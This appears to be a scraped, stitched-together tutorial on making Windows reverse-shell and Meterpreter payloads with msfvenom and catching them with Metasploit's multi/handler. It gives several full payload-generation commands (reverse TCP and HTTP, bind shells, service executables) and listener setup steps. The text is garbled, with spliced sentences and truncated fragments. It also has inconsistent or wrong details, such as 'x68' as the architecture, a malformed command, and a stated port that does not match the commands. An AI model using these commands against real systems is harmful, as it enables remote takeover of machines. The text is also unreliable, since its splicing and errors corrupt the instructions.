If you don’t specify exe-service, the generated payload won’t be able to give you a persistent shell. In this tutorial we are going to take a look on how to create a reverse tcp payload in the Kali Linux operating system. This must be caught with metasploit. When using msfvenom, you first select the payload you wish to send. It does not work with netcat. Executable - It’s own executable shell with an extension .elf .exe .py .php etc. We first use the multi/handler module at first step and then, we set our payload to be a Windows reverse shell so that it matches the behavior of the executable we created earlier with msfvenom, tell it the LHOST and the LPORT to listen on, and we’re ready to go. We can generate the shell code by running the following command. exe Now, to dump configuration information or shell.exe file files with certutil. msfvenom -p windows/shell_reverse_tcp LHOST=196.168.0.101 LPORT=445 -f exe -o shell_reverse_tcp.exe use exploit/multi/handler set payload windows/shell_reverse… (There are multiple shell codes or payload is available which could be used according to the requirements.) msfvenom -p windows/shell_bind_tcp -f c -a x68 Binaries Msfvenom is capable of creating a wide variety of payloads across multiple languages, systems and architectures.. msfvenom -p windows/shell_reverse_tcp LHOST=ip LPORT=445 -f exe -o shell_reverse_tcp.exe. Here, we are using a TCP reverse connection shell code that will open 4444 port on the server. So you need to type a series of options as shown below: use exploit/multi/handler. Eg: You have an unstable non-interactive low priv shell and you want to get something more stable and efficient on a vulnerable windows machine. set payload windows/shell_reverse_tcp. When Windows makes a call to start a service, it calls the ServiceMain function and expects a return from this call. (You can see a full list of payloads using the –list option.) msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -f c -e generic/none Windows Reverse TCP Shell (Shellcode x86) Only use this one if payload size is no problem and you can't determine the bad chars: You’d generate the payload as an .exe, create a listener, upload and execute. A 32-bit payload is generated with this command “msfvenom.bat –payload windows/meterpreter_reverse_http –format psh –out meterpreter-32.ps1 LHOST=127.0.0.1”: Just as I showed in my post for .exe payloads, we start a handler like this: Now we need to execute the PowerShell scripts. you can follow below syntax: use exploit/multi/handler. MsfVenom is a Metasploit standalone payload generator as a replacement for msfpayload and msfencode. The MSFVenom environment is providing a lot of options in just a single terminal window. msfvenom -p windows/shell_reverse_tcp LPORT=31337 LHOST=YOURIPHERE -f exe-service > shell.exe. msfvenom-p windows / meterpreter / reverse_tcp lhost = 192.168.1.109 lport = 1234-f exe > shell. Staged payload i.